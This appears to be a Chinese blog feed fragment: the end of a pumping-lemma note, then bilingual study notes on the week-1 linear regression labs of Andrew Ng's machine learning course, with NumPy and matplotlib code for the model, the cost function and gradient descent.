泵引理:若 $A$ 是一个正则语言,则存在一个数 $p$(泵长度)使得:如果 $s$ 是 $A$ 中任一长度不小于 $p$ 的字符串,那么 $s$ 可以被分成 3 段 $s=xyz$,满足下述条件(只要否定其中任意一个条件,就能证明语言不是正则的):

    1. 对每一个 $i\ge 0, xy^iz\in A$($y^i$ 是 $i$ 个 $y$ 连接在一起,$y^0$ 等于 $\varepsilon$)
    2. $|y|>0$(字符串 $y$ 的长度大于 0,换言之,$y\ne \varepsilon$)
3. $|xy|\le p$($x$ 和 $y$ 连在一起的长度不超过 $p$)

    我们总能够在离 $s$ 的开始处不太远的地方找到一个非空的串 $y$,然后可以把它看作一个“泵”,重复 $y$ 任意多次,或者去掉它,而所得到的结果串仍然属于 $A$。
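例如,可以用泵引理证明 $B=\{0^n1^n\mid n\ge 0\}$ 不是正则语言(补充的标准例子):反设 $B$ 正则,泵长度为 $p$,取 $s=0^p1^p\in B$。由条件 3 有 $|xy|\le p$,故 $y$ 中只含 0;由条件 2 有 $|y|>0$。于是 $xy^2z$ 中 0 的个数多于 1 的个数,$xy^2z\notin B$,与条件 1 矛盾,故 $B$ 不是正则语言。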

    ]]>
    @@ -9649,7 +9649,7 @@ /posts/ML-%E5%90%B4%E6%81%A9%E8%BE%BE%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0-week1/ - 资源

    Week1

    Optional Lab: Brief Introduction to Python and Jupyter Notebooks

    可选实验:对 Python 与 Jupyter Notebooks 作简短的介绍。

    Welcome to the first optional lab!

    欢迎来到第一次可选实验!

    Optional labs are available to:

    可选实验的用处:

    • provide information - like this notebook

      • 提供信息——像这个笔记本
    • reinforce lecture material with hands-on examples

  • 通过上手实例巩固课程内容
    • provide working examples of routines used in the graded labs

  • 提供计分实验中会用到的例程的可运行示例

    Goals

    目标

    In this lab, you will:

    在这次实验中,你将:

    • Get a brief introduction to Jupyter notebooks

      • 获得对 Jupyter notebooks 的简短介绍
    • Take a tour of Jupyter notebooks

      • 体验一次 Jupyter notebooks
    • Learn the difference between markdown cells and code cells

      • 了解到 markdown cells 与 code cells 的区别
    • Practice some basic python

      • 练习一些基础 Python 知识

    The easiest way to become familiar with Jupyter notebooks is to take the tour available above in the Help menu:

    熟悉 Jupyter notebooks 最简单的方法就是点击 Help 菜单栏中的 User Interface Tour(用户导览)选项

    png

Jupyter notebooks have two types of cells that are used in this course. Cells such as this, which contain documentation, are called Markdown Cells. The name is derived from the simple formatting language used in the cells. You will not be required to produce markdown cells. It's useful to understand the cell pulldown shown in the graphic below. Occasionally, a cell will end up in the wrong mode and you may need to restore it to the right state:

在本课程中会用到 Jupyter notebooks 的两种类型的单元格。像本单元格这样包含文档的单元格称为 Markdown Cells,其名字来自单元格中使用的简洁排版语言。课程不要求你编写 markdown cells,但了解下图所示的单元格类型下拉菜单很有用。有时单元格会进入错误的模式,你可能需要把它恢复到正确的状态:

    png

    The other type of cell is the code cell where you will write your code:

    另一种类型的片段被称之为 code cell,你可以在这里撰写你的代码:

    #This is  a 'Code' Cell
    print("This is code cell")
    This is  code cell

    Python

    You can write your code in the code cells.

你可以在 code cells 中撰写你的代码。

    To run the code, select the cell and either

    要想运行代码,选择这个片段并:

    • hold the shift-key down and hit ‘enter’ or ‘return’
      • 按下 Shift+Enter(或 Return)键
    • click the ‘run’ arrow above
      • 点击 run 按钮

    png

    输出结果

    Print statements will generally use the python f-string style.

    输出结果默认使用 python 的 f-string 风格

    Try creating your own print in the following cell.

    尝试在下面这个片段创建你自己的输出。

    Try both methods of running the cell.

    尝试两种方法运行这个片段。

    # print statements
    variable = "right in the strings!"
    print(f"f strings allow you to embed variables {variable}")
    f strings allow you to embed variables right in the strings!

    Congratulations!

    恭喜!

    You now know how to find your way around a Jupyter Notebook.

    你知道了怎么使用 Jupyter Notebook。


    Optional Lab: Model Representation

    png

    Goals

    In this lab you will:
    在这次实验中你将:

    • Learn to implement the model $f_{w,b}$ for linear regression with one variable
      学习实现单变量线性回归

    Notation

    Here is a summary of some of the notation you will encounter.
    以下是您将遇到的一些符号的摘要.

General Notation 一般表示法 | Description 描述 | Python(if applicable 如果适用)
$a$ | scalar, non bold 标量,非粗体 |
$\mathbf{a}$ | vector, bold 向量,粗体 |
Regression 回归 | |
$\mathbf{x}$ | Training Example feature values(in this lab: Size (1000 sqft))训练样本特征值(本实验中为房屋大小,单位 1000 平方英尺) | x_train
$\mathbf{y}$ | Training Example targets(in this lab: Price (1000s of dollars))训练样本目标值(本实验中为房价,单位 1000 美元) | y_train
$x^{(i)}$, $y^{(i)}$ | $i^{th}$ Training Example 第 $i$ 个训练样本 | x_i, y_i
m | Number of training examples 训练样本数量 | m
$w$ | parameter: weight 参数:权重(斜率) | w
$b$ | parameter: bias 参数:偏置(截距) | b
$f_{w,b}(x^{(i)})$ | The result of the model evaluation at $x^{(i)}$ parameterized by $w,b$: $f_{w,b}(x^{(i)}) = wx^{(i)}+b$ | f_wb

    Tools

    In this lab you will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')

    Problem Statement

    png

    As in the lecture, you will use the motivating example of housing price prediction.
    This lab will use a simple data set with only two data points - a house with 1000square feet(sqft) sold for $300,000 and a house with 2000square feet sold for $500,000. These two points will constitute our data or training set. In this lab, the units of size are 1000sqft and the units of price are 1000s of dollars.

    与课堂一样,您将使用房价预测的激励性示例。
    本实验将使用一个只有两个数据点的简单数据集 - 一个以$300,000 出售的 1000 平方英尺的房子和一个以$500,000 出售的 2000 平方英尺的房子。这两点将构成我们的数据或训练集。在这个实验室中,大小单位是 1000 平方英尺,价格单位是 1000 美元。

Size (1000 sqft)    Price (1000s of dollars)
1.0                 300
2.0                 500

    You would like to fit a linear regression model (shown above as the blue straight line) through these two points, so you can then predict price for other houses - say, a house with 1200sqft.

    您希望通过这两个点拟合线性回归模型(如上图所示为蓝色直线),以便您可以预测其他房屋的价格 - 例如,1200 平方英尺的房屋。

    Please run the following code cell to create your x_train and y_train variables. The data is stored in one-dimensional NumPy arrays.

    请运行以下代码单元以创建“x_train”和“y_train”变量。数据存储在一维 NumPy 数组中。

    # x_train is the input variable (size in 1000square feet)
    # y_train is the target (price in 1000s of dollars)
    x_train = np.array([1.0, 2.0])
    y_train = np.array([300.0, 500.0])
    print(f"x_train = {x_train}")
    print(f"y_train = {y_train}")
x_train = [1. 2.]
y_train = [300. 500.]

    Note: The course will frequently utilize the python ‘f-string’ output formatting described here when printing. The content between the curly braces is evaluated when producing the output.

    注意:本课程在打印时将经常使用此处描述的 python“f-string”输出格式。生成输出时,将计算大括号之间的内容。

    Number of training examples m

    You will use m to denote the number of training examples. Numpy arrays have a .shape parameter. x_train.shape returns a python tuple with an entry for each dimension. x_train.shape[0] is the length of the array and number of examples as shown below.

您将使用 m 表示训练样本的数量。Numpy 数组有一个 .shape 属性。x_train.shape 返回一个 python 元组,每个维度对应一个条目。x_train.shape[0] 是数组的长度,即样本数量,如下所示。

    # m is the number of training examples
    print(f"x_train.shape: {x_train.shape}")
    m = x_train.shape[0]
    print(f"Number of training examples is: {m}")
x_train.shape: (2,)
Number of training examples is: 2

    One can also use the Python len() function as shown below.

    也可以使用 Python len()函数,如下所示。

    # m is the number of training examples
    m = len(x_train)
    print(f"Number of training examples is: {m}")
    Number of training examples is: 2

    Training example x_i, y_i

    You will use (x$^{(i)}$, y$^{(i)}$) to denote the $i^{th}$ training example. Since Python is zero indexed, (x$^{(0)}$, y$^{(0)}$) is (1.0, 300.0) and (x$^{(1)}$, y$^{(1)}$) is (2.0, 500.0).

    To access a value in a Numpy array, one indexes the array with the desired offset. For example the syntax to access location zero of x_train is x_train[0].
    Run the next code block below to get the $i^{th}$ training example.

    您将使用 (x$^{(i)}$, y$^{(i)}$) 来表示第 i 个训练示例。由于 Python 的索引为零,因此 (x$^{(0)}$, y$^{(0)}$) 是 (1.0, 300.0) 和 (x$^{(1)}$, y$^{(1)}$) 是 (2.0, 500.0)。

    要访问 Numpy 数组中的值,请使用所需的偏移量对数组编制索引。例如,访问x_train的位置零的语法是x_train[0]。运行下面的下一个代码块以获取第 i 个训练示例。

    i = 0 # Change this to 1 to see (x^1, y^1)

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(0), y^(0)) = (1.0, 300.0)
    i = 1

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(1), y^(1)) = (2.0, 500.0)

    Plotting the data 绘制数据

    You can plot these two points using the scatter() function in the matplotlib library, as shown in the cell below.

    • The function arguments marker and c show the points as red crosses (the default is blue dots).

    You can use other functions in the matplotlib library to set the title and labels to display

    您可以使用 matplotlib 库中的 scatter() 函数绘制这两个点,如下面的单元格所示。

• 函数参数 marker 和 c 将数据点显示为红色叉号(默认是蓝色圆点)。

    您可以使用 matplotlib 库中的其他函数来设置要显示的标题和标签

    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r')
    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.show()

    png

    Model function 模型函数

    png

    As described in lecture, the model function for linear regression (which is a function that maps from x to y) is represented as

    如讲座中所述,线性回归的模型函数(从 x 映射到 y 的函数)表示为

    $$ f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$

    The formula above is how you can represent straight lines - different values of $w$ and $b$ give you different straight lines on the plot.

上面的公式就是直线的表示方式:不同的 $w$ 和 $b$ 取值对应图上不同的直线。

    Let’s try to get a better intuition for this through the code blocks below. Let’s start with $w = 100$ and $b = 100$.

    让我们尝试通过下面的代码块获得更好的直觉。让我们从 w=100 和 b=100 开始。

    Note: You can come back to this cell to adjust the model’s w and b parameters

    注意:您可以返回此单元格以调整模型的 w 和 b 参数

    w = 100
    b = 100
    print(f"w: {w}")
    print(f"b: {b}")
w: 100
b: 100

    Now, let’s compute the value of $f_{w,b}(x^{(i)})$ for your two data points. You can explicitly write this out for each data point as -

    现在,让我们计算两个数据点的 $f_{w,b}(x^{(i)})$ 值。您可以为每个数据点显式地将其写出为 -

    for $x^{(0)}$, f_wb = w * x[0] + b

    for $x^{(1)}$, f_wb = w * x[1] + b

    For a large number of data points, this can get unwieldy and repetitive. So instead, you can calculate the function output in a for loop as shown in the compute_model_output function below.

    对于大量数据点,这可能会变得笨拙和重复。因此,您可以计算 for 循环中的函数输出,如下面的 compute_model_output 函数所示。

    Note: The argument description (ndarray (m,)) describes a Numpy n-dimensional array of shape (m,). (scalar) describes an argument without dimensions, just a magnitude.

    注意:参数描述 (ndarray (m,)) 描述了形状 (m,) 的 Numpy n 维数组。(scalar)描述一个没有维度的参数,只是一个量级。

Note: np.zeros(n) will return a one-dimensional numpy array with $n$ entries

注意:np.zeros(n) 将返回一个包含 $n$ 个条目的一维 numpy 数组

def compute_model_output(x, w, b):
    """
    Computes the prediction of a linear model
    计算线性模型的预测
    Args:
      x (ndarray (m,)): Data, m examples
      w,b (scalar)    : model parameters
    Returns
      y (ndarray (m,)): target values
    """
    m = x.shape[0]
    f_wb = np.zeros(m)
    for i in range(m):
        f_wb[i] = w * x[i] + b

    return f_wb

    Now let’s call the compute_model_output function and plot the output.

    现在,让我们调用 compute_model_output 函数并绘制输出。

    tmp_f_wb = compute_model_output(x_train, w, b,)

    # Plot our model prediction
    plt.plot(x_train, tmp_f_wb, c='b',label='Our Prediction')

    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r',label='Actual Values')

    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.legend()
    plt.show()

    png

    As you can see, setting $w = 100$ and $b = 100$ does not result in a line that fits our data.

    如您所见,设置 $w = 100$ 和 $b = 100$ 不会生成适合我们数据的线。

    Challenge 挑战

    Try experimenting with different values of $w$ and $b$. What should the values be for a line that fits our data?

    尝试使用 $w$ 和 $b$ 的不同值。适合我们数据的线的值应该是多少?

    Tip:

    You can use your mouse to click on the triangle to the left of the green “Hints” below to reveal some hints for choosing b and w.

    您可以使用鼠标单击下面绿色“提示”左侧的三角形,以显示选择 b 和 w 的一些提示。

    Hints

    • Try $w = 200$ and $b = 100$

    Prediction

    Now that we have a model, we can use it to make our original prediction. Let’s predict the price of a house with 1200sqft. Since the units of $x$ are in 1000’s of sqft, $x$ is 1.2.

现在我们有了一个模型,可以用它来做最初想做的预测。让我们预测一座 1200 平方英尺的房子的价格。由于 $x$ 以 1000 平方英尺为单位,$x$ 取 1.2。

    w = 200                         
    b = 100
    x_i = 1.2
    cost_1200sqft = w * x_i + b

    print(f"${cost_1200sqft:.0f} thousand dollars")
    $340 thousand dollars

    Congratulations!

    In this lab you have learned:

    • Linear regression builds a model which establishes a relationship between features and targets
      • In the example above, the feature was house size and the target was house price
      • for simple linear regression, the model has two parameters $w$ and $b$ whose values are ‘fit’ using training data.
      • once a model’s parameters have been determined, the model can be used to make predictions on novel data.

    在本实验中,您了解了:

    • 线性回归构建一个模型,该模型在特征和目标之间建立关系
      • 在上面的示例中,特征是房屋大小,目标是房价
      • 对于简单的线性回归,模型有两个参数$w$和$b$,其值使用训练数据“拟合”。
      • 一旦确定了模型的参数,该模型就可用于对新数据进行预测。

    Optional Lab: Cost Function

    png

    Goals

    In this lab you will:

    • you will implement and explore the cost function for linear regression with one variable.

    在本次实验中,您将:

    • 您将实现并探索具有一个变量的线性回归的成本函数。

    Tools

    In this lab we will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    • local plotting routines in the lab_utils_uni.py file in the local directory

    在本实验中,我们将利用:

    • NumPy,一个流行的科学计算库
    • Matplotlib,用于绘制数据的流行库
    • 本地目录中 lab_utils_uni.py 文件中的本地绘图例程
    import numpy as np
    %matplotlib widget
    import matplotlib.pyplot as plt
    from lab_utils_uni import plt_intuition, plt_stationary, plt_update_onclick, soup_bowl
    plt.style.use('./deeplearning.mplstyle')

    Problem Statement

    You would like a model which can predict housing prices given the size of the house.
    Let’s use the same two data points as before the previous lab- a house with 1000square feet sold for $300,000 and a house with 2000square feet sold for $500,000.

    您需要一个模型,该模型可以根据房屋的大小预测房价。
让我们使用与上一个实验相同的两个数据点 - 一个以 $300,000 出售的 1000 平方英尺的房子和一个以 $500,000 出售的 2000 平方英尺的房子。

Size (1000 sqft)    Price (1000s of dollars)
1                   300
2                   500
    x_train = np.array([1.0, 2.0])           #(size in 1000square feet)
    y_train = np.array([300.0, 500.0]) #(price in 1000s of dollars)

    Computing Cost

    The term ‘cost’ in this assignment might be a little confusing since the data is housing cost. Here, cost is a measure how well our model is predicting the target price of the house. The term ‘price’ is used for housing data.

本实验中的术语"成本(cost)"可能有点令人困惑,因为数据本身就是住房成本。这里,成本是衡量我们的模型对房屋目标价格预测得好坏的度量;"价格(price)"一词则用于住房数据。

The equation for cost with one variable is:
$$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)})^2 \tag{1}$$

    where
    $$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{2}$$

    • $f_{w,b}(x^{(i)})$ is our prediction for example $i$ using parameters $w,b$.
  • $f_{w,b}(x^{(i)})$ 是用参数 $w,b$ 对样本 $i$ 作出的预测。
• $(f_{w,b}(x^{(i)}) - y^{(i)})^2$ is the squared difference between the target value and the prediction.
  • $(f_{w,b}(x^{(i)}) - y^{(i)})^2$ 是目标值和预测值之间的平方差
• These differences are summed over all the $m$ examples and divided by $2m$ to produce the cost, $J(w,b)$.
  • 把这些差的平方在全部 $m$ 个样本上求和,再除以 $2m$,就得到成本 $J(w,b)$。

    Note, in lecture summation ranges are typically from 1 to m, while code will be from 0 to m-1.
    请注意,在课程中,求和范围通常为 1 到 m,而代码的范围是从 0 到 m-1。

    The code below calculates cost by looping over each example. In each loop:

    • f_wb, a prediction is calculated
    • the difference between the target and the prediction is calculated and squared.
    • this is added to the total cost.

    下面的代码通过循环遍历每个示例来计算成本。在每个循环中:

    • f_wb,计算预测
    • 计算目标和预测之间的差值并平方。
    • 这被添加到总成本中。
def compute_cost(x, y, w, b):
    """
    Computes the cost function for linear regression.
    计算线性回归的成本函数。

    Args:
      x (ndarray (m,)): Data, m examples
      y (ndarray (m,)): target values
      w,b (scalar)    : model parameters

    Returns
      total_cost (float): The cost of using w,b as the parameters for linear regression
      to fit the data points in x and y
      total_cost(float):使用 w,b 作为线性回归参数拟合 x 和 y 中数据点的成本
    """
    # number of training examples
    m = x.shape[0]

    cost_sum = 0
    for i in range(m):
        f_wb = w * x[i] + b
        cost = (f_wb - y[i]) ** 2
        cost_sum = cost_sum + cost
    total_cost = (1 / (2 * m)) * cost_sum

    return total_cost
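可以顺手做个小检验(补充示例):对上一个实验得到的最优参数 $w=200$、$b=100$,两个训练点都被精确拟合,成本应为 0:
compute_cost(x_train, y_train, 200, 100)
0.0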

    Cost Function Intuition

    png
    Your goal is to find a model $f_{w,b}(x) = wx + b$, with parameters $w,b$, which will accurately predict house values given an input $x$. The cost is a measure of how accurate the model is on the training data.

The cost equation (1) above shows that if $w$ and $b$ can be selected such that the predictions $f_{w,b}(x)$ match the target data $y$, the $(f_{w,b}(x^{(i)}) - y^{(i)})^2$ term will be zero and the cost minimized. In this simple two point example, you can achieve this!

    In the previous lab, you determined that $b=100$ provided an optimal solution so let’s set $b$ to 100 and focus on $w$.


    Below, use the slider control to select the value of $w$ that minimizes cost. It can take a few seconds for the plot to update.

    您的目标是找到一个模型,$f_{w,b}(x) = wx + b$,参数$w,b$,这将在给定输入$x$的情况下准确预测房屋价值。成本是模型在训练数据上的准确程度的度量。

上面的成本等式(1)表明,如果可以选择 $w$ 和 $b$,使得预测 $f_{w,b}(x)$ 与目标数据 $y$ 匹配,则 $(f_{w,b}(x^{(i)}) - y^{(i)})^2$ 项将为零,成本达到最小。在这个简单的两点示例中,您可以做到这一点!

    在之前的实验中,您确定$b=100$ 提供了最佳解决方案,因此让我们将 $b$ 设置为 100,并专注于 $w$。


    下面,使用滑块控件选择$w$ 的值,以最大限度地降低成本。可能需要几秒钟才能更新绘图。

    啥也出不来 orz

    plt_intuition(x_train,y_train)
    interactive(children=(IntSlider(value=150, description='w', max=400, step=10), Output()), _dom_classes=('widge…

    The plot contains a few points that are worth mentioning.

    • cost is minimized when $w = 200$, which matches results from the previous lab
• Because the difference between the target and prediction is squared in the cost equation, the cost increases rapidly when $w$ is either too large or too small.
    • Using the w and b selected by minimizing cost results in a line which is a perfect fit to the data.

    该图包含了几个值得一提的要点。

• 当 $w = 200$ 时,成本最小化,这与上一个实验的结果一致
• 由于成本等式对目标值和预测值之差取平方,当 $w$ 太大或太小时,成本都会迅速增加。
• 使用通过最小化成本选出的 wb,可以得到一条与数据完美拟合的直线。

    Cost Function Visualization- 3D

    You can see how cost varies with respect to both w and b by plotting in 3D or using a contour plot.
    It is worth noting that some of the plotting in this course can become quite involved. The plotting routines are provided and while it can be instructive to read through the code to become familiar with the methods, it is not needed to complete the course successfully. The routines are in lab_utils_uni.py in the local directory.

您可以通过 3D 绘图或等高线图来观察成本相对于 wb 两者的变化。
值得注意的是,本课程中的一些绘图可能相当复杂。绘图例程已经提供;通读这些代码来熟悉方法会很有启发,但这并不是顺利完成课程所必需的。这些例程位于本地目录的 lab_utils_uni.py 中。

    Larger Data Set

It is instructive to view a scenario with a few more data points. This data set includes data points that do not fall on the same line. What does that mean for the cost equation? Can we find $w$, and $b$ that will give us a cost of 0?

观察一个数据点更多的场景很有启发性。这个数据集包含不在同一条直线上的数据点。这对成本等式意味着什么?我们能找到使成本为 0 的 $w$ 和 $b$ 吗?

    x_train = np.array([1.0, 1.7, 2.0, 2.5, 3.0, 3.2])
    y_train = np.array([250, 300, 480, 430, 630, 730,])

    In the contour plot, click on a point to select w and b to achieve the lowest cost. Use the contours to guide your selections. Note, it can take a few seconds to update the graph.

    在等值线图中,单击一个点以选择wb以实现最低成本。使用等值线来指导您的选择。请注意,更新图表可能需要几秒钟。

    plt.close('all') 
    fig, ax, dyn_items = plt_stationary(x_train, y_train)
    updater = plt_update_onclick(fig, ax, x_train, y_train, dyn_items)

    png

    Above, note the dashed lines in the left plot. These represent the portion of the cost contributed by each example in your training set. In this case, values of approximately $w=209$ and $b=2.4$ provide low cost. Note that, because our training examples are not on a line, the minimum cost is not zero.

    在上面,请注意左侧图中的虚线。这些表示训练集中每个示例所贡献的成本部分。在这种情况下,大约$w=209$和$b=2.4$提供了低成本。请注意,由于我们的训练示例不在一条线上,因此最低成本不为零。

    Convex Cost surface

    The fact that the cost function squares the loss ensures that the ‘error surface’ is convex like a soup bowl. It will always have a minimum that can be reached by following the gradient in all dimensions. In the previous plot, because the $w$ and $b$ dimensions scale differently, this is not easy to recognize. The following plot, where $w$ and $b$ are symmetric, was shown in lecture:

成本函数对损失取平方,保证了"误差曲面"像汤碗一样是凸的。它总是存在一个最小值,沿着各个维度的梯度走就能到达。在前面的图中,由于 $w$ 和 $b$ 两个维度的尺度不同,这一点不容易看出来。下图中 $w$ 和 $b$ 是对称的,课程中展示过:

    soup_bowl()

    png
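如果手头没有 lab_utils_uni,也可以用几行 matplotlib 自己画一个粗略的成本曲面(示意性写法,非课程提供的代码;网格范围是随意选的):

w_grid, b_grid = np.meshgrid(np.linspace(-100, 500, 60), np.linspace(-200, 400, 60))
J = np.zeros_like(w_grid)
for i in range(len(x_train)):            # 对每个样本累加平方误差
    J += (w_grid * x_train[i] + b_grid - y_train[i]) ** 2
J /= 2 * len(x_train)                    # 成本 J(w,b)

ax = plt.figure().add_subplot(projection='3d')
ax.plot_surface(w_grid, b_grid, J, cmap='viridis')
ax.set_xlabel('w'); ax.set_ylabel('b'); ax.set_zlabel('J(w,b)')
plt.show()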

    Congratulations!

    You have learned the following:

    • The cost equation provides a measure of how well your predictions match your training data.
    • Minimizing the cost can provide optimal values of $w$, $b$.

    您已经了解了以下内容:

    • 成本等式用于衡量您的预测与训练数据匹配的程度。
    • 最小化成本可以提供$w$,$b$的最佳值。

    Optional Lab: Gradient Descent for Linear Regression

    png

    Goals

    In this lab, you will:

    • automate the process of optimizing $w$ and $b$ using gradient descent.
    • 使用梯度下降自动执行优化 $w$ 和 $b$ 的过程。

    Tools

    In this lab, we will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    • plotting routines in the lab_utils.py file in the local directory
    import math, copy
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')
    from lab_utils_uni import plt_house_x, plt_contour_wgrad, plt_divergence, plt_gradients
    !ls -al
    'ls' 不是内部或外部命令,也不是可运行的程序或批处理文件。

    Problem Statement

    Let’s use the same two data points as before - a house with 1000square feet sold for $300,000 and a house with 2000square feet sold for $500,000.

Size (1000 sqft)    Price (1000s of dollars)
1                   300
2                   500
    # Load our data set
    x_train = np.array([1.0, 2.0]) #features
    y_train = np.array([300.0, 500.0]) #target value

    Compute_Cost

    This was developed in the last lab. We’ll need it again here.

    这是在上一个实验中撰写的。我们在这里再次需要它。

    #Function to calculate the cost
    def compute_cost(x, y, w, b):

    m = x.shape[0]
    cost = 0

    for i in range(m):
    f_wb = w * x[i] + b
    cost = cost + (f_wb - y[i])**2
    total_cost = 1 / (2 * m) * cost

    return total_cost

    Gradient descent summary

    So far in this course, you have developed a linear model that predicts $f_{w,b}(x^{(i)})$:

    到目前为止,在本课程中,您已经开发了一个线性模型来预测 $f_{w,b}(x^{(i)})$:

    $$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$
In linear regression, you utilize input training data to fit the parameters $w$,$b$ by minimizing a measure of the error between our predictions $f_{w,b}(x^{(i)})$ and the actual data $y^{(i)}$. The measure is called the $cost$, $J(w,b)$. In training you measure the cost over all of our training samples $x^{(i)},y^{(i)}$

在线性回归中,您利用输入的训练数据,通过最小化预测 $f_{w,b}(x^{(i)})$ 与实际数据 $y^{(i)}$ 之间的误差度量来拟合参数 $w$、$b$。该度量称为成本 $J(w,b)$。在训练中,您在所有训练样本 $x^{(i)},y^{(i)}$ 上度量这个成本:

$$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)})^2\tag{2}$$

    In lecture, gradient descent was described as:

    在课程中,梯度下降被描述为:

$$\begin{align*} \text{repeat}&\text{ until convergence:} \; \lbrace \newline
\; w &= w - \alpha \frac{\partial J(w,b)}{\partial w} \tag{3} \; \newline
 b &= b - \alpha \frac{\partial J(w,b)}{\partial b} \newline \rbrace
\end{align*}$$
    where, parameters $w$, $b$ are updated simultaneously.

    其中,参数 w、b 同时更新。

    The gradient is defined as:

    梯度定义为:

$$
\begin{align}
\frac{\partial J(w,b)}{\partial w} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)})x^{(i)} \tag{4}\\
\frac{\partial J(w,b)}{\partial b} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)}) \tag{5}\\
\end{align}
$$

Here simultaneously means that you calculate the partial derivatives for all the parameters before updating any of the parameters.

    此处 同时 表示在更新任何参数之前计算所有参数的偏导数。

    Implement Gradient Descent 实现梯度下降

    You will implement gradient descent algorithm for one feature. You will need three functions.

    您将为一个要素实现梯度下降算法。您将需要三个函数。

    • compute_gradient implementing equation (4) and (5) above
      • 实现上述等式(4)和(5)
    • compute_cost implementing equation (2) above (code from previous lab)
      • 实现上面的等式(2)(上一个实验的代码)
    • gradient_descent, utilizing compute_gradient and compute_cost
      • 利用 compute_gradient 和 compute_cost

    Conventions: 规定:

    • The naming of python variables containing partial derivatives follows this pattern,$\frac{\partial J(w,b)}{\partial b}$ will be dj_db.
      • 包含偏导数的 python 变量的命名遵循此模式, 将 $\frac{\partial J(w,b)}{\partial b}$ 记作 dj_db
    • w.r.t is With Respect To, as in partial derivative of $J(wb)$ With Respect To $b$.
      • w.r.t 是关于,如 $J(wb)$ 相对于 $b$ 的偏导数。

    compute_gradient


    compute_gradient implements (4) and (5) above and returns $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$. The embedded comments describe the operations.

    compute_gradient 实现 (4) 和 (5) 并返回 $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$。嵌入的注释描述操作。

def compute_gradient(x, y, w, b):
    """
    Computes the gradient for linear regression
    计算线性回归的梯度
    Args:
      x (ndarray (m,)): Data, m examples
      y (ndarray (m,)): target values
      w,b (scalar)    : model parameters
    Returns
      dj_dw (scalar): The gradient of the cost w.r.t. the parameters w
      dj_db (scalar): The gradient of the cost w.r.t. the parameter b
    """

    # Number of training examples
    m = x.shape[0]
    dj_dw = 0
    dj_db = 0

    for i in range(m):
        f_wb = w * x[i] + b
        dj_dw_i = (f_wb - y[i]) * x[i]
        dj_db_i = f_wb - y[i]
        dj_db += dj_db_i
        dj_dw += dj_dw_i
    dj_dw = dj_dw / m
    dj_db = dj_db / m

    return dj_dw, dj_db
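可以先做个快速检验(补充示例):在上一个实验找到的最优点 $w=200$、$b=100$ 处,两个偏导数都应为 0:
compute_gradient(x_train, y_train, 200, 100)
(0.0, 0.0)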

    png

    The lectures described how gradient descent utilizes the partial derivative of the cost with respect to a parameter at a point to update that parameter.
    Let’s use our compute_gradient function to find and plot some partial derivatives of our cost function relative to one of the parameters, $w_0$.

    课程描述了梯度下降如何利用成本相对于某个点的参数的偏导数来更新该参数。
    让我们使用compute_gradient函数来查找并绘制成本函数相对于其中一个参数 $w_0$ 的一些偏导数。

    plt_gradients(x_train,y_train, compute_cost, compute_gradient)
    plt.show()

    png

    Above, the left plot shows $\frac{\partial J(w,b)}{\partial w}$ or the slope of the cost curve relative to $w$ at three points. On the right side of the plot, the derivative is positive, while on the left it is negative. Due to the ‘bowl shape’, the derivatives will always lead gradient descent toward the bottom where the gradient is zero.

上图左侧显示了 $\frac{\partial J(w,b)}{\partial w}$,即成本曲线相对于 $w$ 在三个点处的斜率。在图的右侧,导数为正;在左侧,导数为负。由于"碗形",导数总是把梯度下降引向梯度为零的碗底。

    The left plot has fixed $b=100$. Gradient descent will utilize both $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ to update parameters. The ‘quiver plot’ on the right provides a means of viewing the gradient of both parameters. The arrow sizes reflect the magnitude of the gradient at that point. The direction and slope of the arrow reflects the ratio of $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ at that point.
    Note that the gradient points away from the minimum. Review equation (3) above. The scaled gradient is subtracted from the current value of $w$ or $b$. This moves the parameter in a direction that will reduce cost.

左图固定了 $b=100$。梯度下降会同时利用 $\frac{\partial J(w,b)}{\partial w}$ 和 $\frac{\partial J(w,b)}{\partial b}$ 来更新参数。右侧的"箭袋图(quiver plot)"提供了同时查看两个参数梯度的方法。箭头的大小反映该点处梯度的大小;箭头的方向和斜率反映该点处 $\frac{\partial J(w,b)}{\partial w}$ 与 $\frac{\partial J(w,b)}{\partial b}$ 的比值。注意,梯度方向指向远离最小值的一侧。回顾上面的等式(3):缩放后的梯度是从 $w$ 或 $b$ 的当前值中减去的,这会把参数朝降低成本的方向移动。

    Gradient Descent 梯度下降

    Now that gradients can be computed, gradient descent, described in equation (3) above can be implemented below in gradient_descent. The details of the implementation are described in the comments. Below, you will utilize this function to find optimal values of $w$ and $b$ on the training data.

